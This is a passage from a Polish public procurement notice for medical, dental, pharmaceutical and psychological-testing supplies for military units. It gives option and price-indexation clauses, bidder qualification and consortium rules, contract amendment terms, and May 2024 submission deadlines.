przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa sprzętu w celu wyposażenia pracowni psychologicznej WCR. Na sprzęt obowiązuje gwarancja producenta. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33156000-8 - Przyrządy do testów psychologicznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa materiałów medycznych w celu wyposażenia gabinetu fizjoterapii 31BLT. Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33190000-8 - Różne urządzenia i produkty medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa materiałów medycznych w celu wyposażenia gabinetu stomatologicznego 31 BLT. Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33190000-8 - Różne urządzenia i produkty medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zakup i dostawa produktów leczniczych w celu wyposażenia gabinetu stomatologicznego. Minimalny termin ważności określono w załączniku nr 4 do SWZ – formularz cenowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje prawo opcji, do 90% wysokości kwoty brutto umowy. Wykorzystanie prawa opcji będzie uzależnione od rzeczywistych potrzeb Zamawiającego i jest wszczynane na podstawie pisemnego oświadczenia woli Zamawiającego, a Wykonawca będzie zobowiązany podjąć się jej realizacji w ramach przedmiotowej umowy. Realizowanie opcji będzie odbywało się w oparciu o ceny jednostkowe zawarte w formularzu cenowym (załącznik nr 1 do umowy). Zamówienie w ramach opcji będzie realizowane na tych samych warunkach co zamówienie podstawowe. Wykonawcy będzie przysługiwało odrębne wynagrodzenie za dostawy w ramach prawa opcji. <br/>2.	Rozszerzenie zamówienia w ramach opcji będzie realizowane w terminie do 30.11.2024 r. Zamawiający może skorzystać z uruchomienia prawa opcji najpóźniej w terminie do dnia 31.10.2024 r.<br/>3.	Zamawiający zastrzega, że część zamówienia określona jako prawo opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Realizacja opcji może, ale nie musi nastąpić, w zależności od zapotrzebowania Zamawiającego i na skutek jego dyspozycji w tym zakresie. Brak realizacji zamówienia w tym zakresie nie może rodzić żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <br/>4.	W przypadku uruchomienia prawa opcji Zamawiający dopuszcza jednorazową waloryzację cen/y jednostkowych/ej netto według wskaźnika cen usług opublikowanego w komunikacie Prezesa GUS. <br/>5.	Waloryzacja o której mowa w ust. 4 jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>a)	złożenia pisemnego wniosku przez Wykonawcę wraz z dokumentem wskazanym w ust. 4, zawierającym wskaźniki cenowe oraz dokumentami potwierdzającymi wzrost cen i kosztów,<br/>b)	upływu co najmniej 6 miesięcy od dnia obowiązywania umowy,<br/>c)	zmiany wskaźnika o co najmniej 12% w stosunku do cen/y wskazanych/ej w załączniku nr 2 do umowy.<br/>7.	Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej wskaźniki cen (o których mowa w ust. 5) za kwartał poprzedzający złożenie wniosku, o którym mowa w ust. 5 pkt a), w odniesieniu do cen wskazanych w załączniku nr 1 do umowy. <br/>8.	Maksymalna wartość zmiany wysokości wynagrodzenia jaką dopuszcza Zamawiający na podstawie zasad określonych w § 8 ust. 5, wynosi 20 % względem wysokości wynagrodzenia Wykonawcy wskazanego w § 2 ust. 1.<br/>9.	Zgodnie z art. 439 ust.5 uPzp Wykonawca którego wynagrodzenie zostanie zmienione zgodnie z ust. 5 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) OŚWIADCZENIE składane na podstawie art. 125 ustawy Pzp – wg złącznika nr 2, 2a do SWZ - aktualne na dzień<br/>składania ofert,<br/>Oświadczenie składają odrębnie:<br/>˗ Wykonawca<br/>˗ Podmiot udostępniający zasoby, w zakresie w jakim go dotyczy – (jeżeli dotyczy)<br/>˗ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia - (jeżeli dotyczy).<br/>2) PEŁNOMOCNICTWO do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>W przypadku podpisania oferty przez osobę niewymienioną w dokumencie potwierdzającym uprawnienie do występowania<br/>w obrocie prawnym – należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy. Pełnomocnictwo do złożenia oferty<br/>musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu)<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego<br/>stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w<br/>formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego;<br/>3) ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY do oddania wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia. Zobowiązanie podmiotu udostępniającego zasoby może być<br/>zastąpione innym podmiotowym środkiem dowodowym potwierdzającym, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tego podmiotu – wg załącznika nr 3 do SWZ.<br/>Uwaga! Ww. zobowiązanie należy złożyć tylko wtedy, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotu<br/>udostępniającego zasoby.<br/>4) OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH się o udzielenie zamówienia wskazujące, które roboty<br/>wykonują poszczególni Wykonawcy (jeżeli dotyczy) – wg zał. nr 4 do SWZ.<br/>Uwaga! Ww. oświadczenie należy złożyć tylko w przypadku wspólnego ubiegania się Wykonawców o udzielenie<br/>zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dotycząca wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne).<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną<br/>formę prawną.<br/>2) Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnik konsorcjum, po zalogowaniu się na profilu Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda<br/>pozostałych Wykonawców wpisując ich dane.<br/>3) Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego<br/>Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące<br/>dla wszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców<br/>wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie<br/>ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę<br/>wspólną.<br/>4) Wykonawcy składający ofertę wspólną wraz z ofertą składają stosowne pełnomocnictwo w oryginale podpisane zgodnie z<br/>zaleceniami zawartymi w Rozdziale XII ust. 7 pkt 2) uprawniające do wykonania określonych czynności w postępowaniu o<br/>udzielenie zamówienia publicznego.<br/>5) Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie ze SWZ;<br/>b) sposób składania dokumentów w ofercie wspólnej – dokumenty składane przez członków konsorcjum czy wspólników<br/>spółki cywilnej, w tym oświadczenia muszą być podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do<br/>reprezentowania danego podmiotu.<br/>6) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na zasadach określonych w art. 58<br/>ustawy Pzp, brak podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie<br/>oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane w postępowaniu składa odrębnie każdy z<br/>Wykonawców wspólnie występujących.<br/>7) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień niniejszej umowy wymaga formy pisemnej, pod rygorem nieważności. Niedopuszczalne są zmiany postanowień umowy, o których mowa w art. 454 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. <br/>2.	Strony przewidują następujące możliwości zmiany umowy: <br/>1)	zamiana poszczególnego przedmiotu umowy, o którym mowa w § 1 ust. 1 umowy, na asortyment równoważny, tj. przedmiot umowy o co najmniej takich samych cechach lub lepszych od cech wskazanych w opisie przedmiotu zamówienia, lecz oznaczonych innym znakiem towarowym. Cena zamiennika nie będzie wyższa od wskazanej w ofercie;<br/>2)	zmiana nazwy handlowej produktu, o ile zmiana ta została dokonana przez producenta i została potwierdzona stosownym dokumentem; <br/>3)	w zakresie koniecznym z powodu zmiany przepisów prawa powszechnie obowiązującego; <br/>4)	brak przedmiotów umowy, które były przedmiotem złożonej oferty na rynku, tj. producent danego towaru wycofał go z produkcji lub wprowadził inne jego oznaczenie, a na jego miejsce wprowadził towar o innym oznaczeniu i zmiany te nie obniżają standardu określonego powyższą umową lub są jakościowo wyższe; <br/>5)	zmiana danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.); <br/>6)	innych istotnych postanowień umowy - gdy ich zmiana jest konieczna w związku ze zmianą decyzji wydawanych przez Ministra Obrony Narodowej, bądź zmianą wytycznych przełożonych Zamawiającego; <br/>7)	zmiany terminu wykonania umowy – gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu umowy w umówionym terminie, bądź gdy niewykonanie umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego; <br/>8)	przedłużenia terminu wykonania umowy, o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą, w przypadku, gdy zostało wniesione odwołanie w postępowaniu o udzielenie zamówienia publicznego; <br/>9)	w przypadku zmiany stawki podatku od towarów i usług, dotyczącej przedmiotu umowy, w wyniku zmiany przepisów o podatku od towarów i usług, które wejdą w życie po dniu zawarcia niniejszej umowy, wartość brutto przedmiotu umowy zostanie zmieniona na pisemny wniosek Wykonawcy oraz po zawarciu przez Strony stosownego aneksu, w wyniku zastosowania zmienionej stawki podatku od towarów i usług. Zmiany mogą być dokonane na pisemny wniosek Wykonawcy. <br/>3.	Zmiany, o których mowa w ust. 2 mogą być dokonane po złożeniu przez Wykonawcę pisemnego wniosku wraz z podaniem okoliczności uzasadniających zmianę (np. oświadczenie od producenta o wycofaniu z produkcji towaru będącego przedmiotem umowy). Warunkiem zmiany jest pozytywne rozpatrzenie wniosku przez Zamawiającego.<br/>4.	Zmiana przedmiotu umowy, jest dopuszczalna pod warunkiem, że przedmiot umowy zaoferowany jako zamiennik zawiera w składzie tę samą substancję aktywną, w tej samej dawce oraz ma zarejestrowane te same wskazania, co wyrób objęty umową. <br/>5.	Zamawiający, dopuszcza dostarczenie przedmiotu umowy zamiennego (równoważnego, tj. takiego, który zaoferowany w ofercie zostałby uznany za spełniający warunki postawione w zapytaniu ofertowym) w stosunku do asortymentu, który został wskazany w formularzu asortymentowo-cenowym. Cena zamiennika nie może być wyższa od ceny asortymentu określonego w formularzu asortymentowo-cenowym. Dostarczenie zamiennika asortymentu może nastąpić po wcześniejszym powiadomieniu Zamawiającego i o ile Zamawiający wyrazi na to pisemną zgodę. <br/>6.	Powyższe wymaga sporządzenia aneksu. <br/>7.	Zmiany przedmiotu umowy, w tym producenta, oferowanie przedmiotu zamiennego itp. nie są podstawą do zwiększenia ceny jednostkowej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Miejsce składania ofert: Wykonawca składa ofertę w formie elektronicznej lub postaci elektronicznej wraz z załącznikami na https://portal.smartpzp.pl/31blt.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-21 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w 